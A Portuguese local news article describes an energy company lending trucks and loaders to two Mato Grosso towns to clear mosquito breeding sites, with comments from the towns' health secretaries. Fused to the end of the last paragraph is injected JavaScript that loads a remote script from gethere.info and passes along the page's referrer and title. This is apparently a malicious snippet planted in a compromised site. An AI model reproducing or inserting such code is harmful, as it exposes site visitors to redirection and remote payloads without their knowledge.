Capa / Cidades / Empresa de Energia São Manoel disponibiliza equipamentos para o controle do Aedes aegypti

Empresa de Energia São Manoel disponibiliza equipamentos para o controle do Aedes aegypti

IMG_0823Assessoria São Manoel

A Empresa de Energia São Manoel (EESM) firmou acordo de cooperação técnica juntamente com as secretarias de saúde das prefeituras de Alta Floresta e Paranaíta para o controle ao mosquito Aedes aegypti que é o vetor transmissor do Zika Vírus, Chikungunya e Dengue. Nesta parceria foi feito o fornecimento de caminhões basculantes e pás carregadeiras, no período de três meses, para o recolhimento de resíduos que possam acumular água, em residências e comércios dos municípios.
De acordo com o secretário de saúde de Alta Floresta José Luiz Augusto Teixeira, o apoio da EESM contribuiu para a limpeza da cidade, visto que são poucos os recursos municipais disponíveis para controlar com mais eficácia os diversos pontos de possível incidência do inseto vetor. Ele afirmou que embora as visitas de agentes de saúde, palestras e o combate ao mosquito com termonebulizadores (fumacê) estejam em atividade, a população precisa estar atenta aos reservatórios de água acumulada nos quintais. Ele pontuou que com o apoio da empresa, em duas semanas, cerca de 70% dos bairros da cidade já havia contado com os equipamentos para a retirada de entulhos e materiais.
Em Paranaíta, o secretário de saúde Marcelo Costa explica que a meta nesta parceria é manter a cidade 100% limpa e, que por mais que os maquinários estejam disponibilizados por 90 dias, as ações de vigilância em saúde de controle ao mosquito perduraram ao longo de todo o ano.
Além dos veículos utilizados para a limpeza das cidades, a EESM está mobilizada em outras diversas ações para a intensificação de campanhas contra o Aedes aegypti, como a produção e distribuição de materiais educativos como folders, faixas, cartazes, banners e a capacitação de agentes de controle químico – em atendimento ao Programa de Controle e Prevenção de Doenças da UHE São Manoel.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top